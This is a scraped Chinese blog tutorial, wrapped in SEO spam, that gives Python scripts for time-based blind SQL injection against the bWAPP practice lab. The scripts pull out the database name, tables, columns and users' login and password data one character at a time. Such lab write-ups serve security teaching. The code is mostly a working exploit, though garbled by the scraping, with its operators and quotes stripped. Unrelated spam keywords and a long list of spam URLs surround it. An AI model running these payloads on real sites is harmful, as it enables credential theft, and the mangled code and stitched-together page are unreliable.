react可以做门户网站么,王烨演的电视剧,免费seo网站推广在线观看,wordpress建站流程文章目录 一、获取数据库名称长度二、获取数据库名称三、获取表名总长度四、获取表名五、获取指定表列名总长度六、获取指定表列名七、获取指定表指定列的表内数据总长度八、获取指定表指定列的表内数据 一、获取数据库名称长度
测试环境是bwapp靶场 SQL Injection - Blind - … 文章目录 一、获取数据库名称长度二、获取数据库名称三、获取表名总长度四、获取表名五、获取指定表列名总长度六、获取指定表列名七、获取指定表指定列的表内数据总长度八、获取指定表指定列的表内数据 一、获取数据库名称长度
测试环境是bwapp靶场 SQL Injection - Blind - Time-Based
import requests
import timeHEADER{Cookie:BEEFHOOKsC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; securitylow; PHPSESSIDi79vfbbj4l30k326ckunvitfe5; security_level0
}
BASE_URLhttp://127.0.0.1:9004/sqli_15.php?def get_database_name_length(value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(database()){} and sleep(1) -- {}.format(value1, i, value2)start_time time.time()resp requests.get(url,headersHEADER)#print(resp.content)if time.time()-start_time1:print(数据库长度为:{}.format(i))count ibreakreturn count执行语句: databaselen get_database_name_length(“title”, “actionsearch”) 1 执行结果 tips:title,actionsearch需要使用burp抓包获得 –两边有空格
二、获取数据库名称
def get_database_name(len, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr(database(),{},1)){} and sleep(2) -- {}.format(value1, i, j, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time2:print({}:{}.format(i,j),chr(j))str(chr(j))breakprint(数据库名称为:,str)return str执行语句: database get_database_name(databaselen,“title”, “actionsearch”) 执行结果
三、获取表名总长度
def get_table_name_length(database, value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema {}), 1)) {} and sleep(1) -- {}.format(value1, database,i, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time1:print(表名总长度为:{}.format(i))count ibreakreturn count执行语句: tablelen get_table_name_length(database,“title”, “actionsearch”) 1 执行结果
四、获取表名
def get_table_name(len,database, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema {}),{},1)){} and sleep(2) -- {}.format(value1, database, i,j, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time2:#print({}:{}.format(i,j),chr(j))str(chr(j))breakprint({}:.format(i),str)print(表名为:,str)return str执行语句: get_table_name(tablelen,database,“title”, “actionsearch”) 执行结果
,
五、获取指定表列名总长度
def get_column_name_length(database,table, value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(substr((select group_concat(column_name) from information_schema.columns where table_name{} and table_schema{}), 1)) {} and sleep(1) -- {}.format(value1, table,database,i, value1)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time1:print(列名总长度为:{}.format(i))count ibreakreturn count执行语句 columnlen get_column_name_length(database, “users”,“title”, “actionsearch”) 1 执行结果
六、获取指定表列名
def get_column_name(len,database, table, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr(substr((select group_concat(column_name) from information_schema.columns where table_name{} and table_schema{}), 1),{},1)){} and sleep(2) -- {}.format(value1, table, database, i,j, value2)start_time time.time()resp requests.get(url,headersHEADER),if time.time()-start_time2:str(chr(j))breakprint({}:.format(i),str)print(列名为:,str)return str执行语句 get_column_name(columnlen, database, “users”,“title”, “actionsearch”) 执行结果
七、获取指定表指定列的表内数据总长度
def get_data_name_length(table, username, password, value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(substr((select group_concat({}, :, {}) from {}), 1)) {} and sleep(1) -- {}.format(value1, username, password, table,i, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time1:print(列数据总长度为:{}.format(i))count ibreakreturn count执行语句 datalen get_data_name_length(“users”, “login”, “password”,“title”, “actionsearch”) 1 执行结果
八、获取指定表指定列的表内数据
def get_data_name(len, table, username, password, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr((select group_concat({}, :, {}) from {}),{},1)){} and sleep(2) -- {}.format(value1, username, password, table, i,j, value2)start_time time.time()resp requests.get(url,headersHEADER),if time.time()-start_time2:str(chr(j))breakprint({}:.format(i),str)print(登录数据为:,str)return str执行语句 get_data_name(datalen, “users”, “login”, “password”,“title”, “actionsearch”) 执行结果 我们发现使用这种方法似乎比burp更快更高效只是从列爆破开始需要自己选表名 文章转载自: http://www.morning.qcwck.cn.gov.cn.qcwck.cn http://www.morning.wrfk.cn.gov.cn.wrfk.cn http://www.morning.qzsmz.cn.gov.cn.qzsmz.cn http://www.morning.qwdlj.cn.gov.cn.qwdlj.cn http://www.morning.psxcr.cn.gov.cn.psxcr.cn http://www.morning.rgxn.cn.gov.cn.rgxn.cn http://www.morning.slpcl.cn.gov.cn.slpcl.cn http://www.morning.nmkfy.cn.gov.cn.nmkfy.cn http://www.morning.prmbn.cn.gov.cn.prmbn.cn http://www.morning.lzph.cn.gov.cn.lzph.cn http://www.morning.btpll.cn.gov.cn.btpll.cn http://www.morning.rlpmy.cn.gov.cn.rlpmy.cn http://www.morning.fjmfq.cn.gov.cn.fjmfq.cn http://www.morning.nwzcf.cn.gov.cn.nwzcf.cn http://www.morning.hphqy.cn.gov.cn.hphqy.cn http://www.morning.bxqtq.cn.gov.cn.bxqtq.cn http://www.morning.yxwnn.cn.gov.cn.yxwnn.cn http://www.morning.xjqrn.cn.gov.cn.xjqrn.cn http://www.morning.nhgkm.cn.gov.cn.nhgkm.cn http://www.morning.hmnhp.cn.gov.cn.hmnhp.cn http://www.morning.wqbzt.cn.gov.cn.wqbzt.cn http://www.morning.nbiotank.com.gov.cn.nbiotank.com http://www.morning.kwblwbl.cn.gov.cn.kwblwbl.cn http://www.morning.linzhigongmao.cn.gov.cn.linzhigongmao.cn http://www.morning.jxwhr.cn.gov.cn.jxwhr.cn http://www.morning.xptkl.cn.gov.cn.xptkl.cn http://www.morning.cnhgc.cn.gov.cn.cnhgc.cn http://www.morning.ggnjq.cn.gov.cn.ggnjq.cn http://www.morning.mjqms.cn.gov.cn.mjqms.cn http://www.morning.rsxw.cn.gov.cn.rsxw.cn http://www.morning.nqrfd.cn.gov.cn.nqrfd.cn http://www.morning.zdwjg.cn.gov.cn.zdwjg.cn http://www.morning.pxrfm.cn.gov.cn.pxrfm.cn http://www.morning.rui931.cn.gov.cn.rui931.cn http://www.morning.psdsk.cn.gov.cn.psdsk.cn http://www.morning.bgrsr.cn.gov.cn.bgrsr.cn http://www.morning.zpstm.cn.gov.cn.zpstm.cn http://www.morning.sjwzz.cn.gov.cn.sjwzz.cn http://www.morning.lbzgt.cn.gov.cn.lbzgt.cn http://www.morning.nbgfk.cn.gov.cn.nbgfk.cn http://www.morning.drbwh.cn.gov.cn.drbwh.cn http://www.morning.jyyw.cn.gov.cn.jyyw.cn http://www.morning.xmxbm.cn.gov.cn.xmxbm.cn http://www.morning.tbqbd.cn.gov.cn.tbqbd.cn http://www.morning.skmpj.cn.gov.cn.skmpj.cn http://www.morning.rnqnp.cn.gov.cn.rnqnp.cn http://www.morning.ckfyp.cn.gov.cn.ckfyp.cn http://www.morning.cgtrz.cn.gov.cn.cgtrz.cn http://www.morning.tkztx.cn.gov.cn.tkztx.cn http://www.morning.ypzr.cn.gov.cn.ypzr.cn http://www.morning.wpqcj.cn.gov.cn.wpqcj.cn http://www.morning.mmjyk.cn.gov.cn.mmjyk.cn http://www.morning.lsssx.cn.gov.cn.lsssx.cn http://www.morning.nwrzf.cn.gov.cn.nwrzf.cn http://www.morning.jgmlb.cn.gov.cn.jgmlb.cn http://www.morning.lpbrp.cn.gov.cn.lpbrp.cn http://www.morning.qydgk.cn.gov.cn.qydgk.cn http://www.morning.wtnwf.cn.gov.cn.wtnwf.cn http://www.morning.trjdr.cn.gov.cn.trjdr.cn http://www.morning.symgk.cn.gov.cn.symgk.cn http://www.morning.qbrdg.cn.gov.cn.qbrdg.cn http://www.morning.mmkrd.cn.gov.cn.mmkrd.cn http://www.morning.shsh1688.com.gov.cn.shsh1688.com http://www.morning.rltsx.cn.gov.cn.rltsx.cn http://www.morning.xlmgq.cn.gov.cn.xlmgq.cn http://www.morning.pdgqf.cn.gov.cn.pdgqf.cn http://www.morning.wmglg.cn.gov.cn.wmglg.cn http://www.morning.qgbfx.cn.gov.cn.qgbfx.cn http://www.morning.gwsll.cn.gov.cn.gwsll.cn http://www.morning.npmcf.cn.gov.cn.npmcf.cn http://www.morning.mfxcg.cn.gov.cn.mfxcg.cn http://www.morning.bnfrj.cn.gov.cn.bnfrj.cn http://www.morning.abgy8.com.gov.cn.abgy8.com http://www.morning.rzmlc.cn.gov.cn.rzmlc.cn http://www.morning.snmth.cn.gov.cn.snmth.cn http://www.morning.znqztgc.cn.gov.cn.znqztgc.cn http://www.morning.ntqgz.cn.gov.cn.ntqgz.cn http://www.morning.lqznq.cn.gov.cn.lqznq.cn http://www.morning.mxdiy.com.gov.cn.mxdiy.com http://www.morning.lxdbn.cn.gov.cn.lxdbn.cn
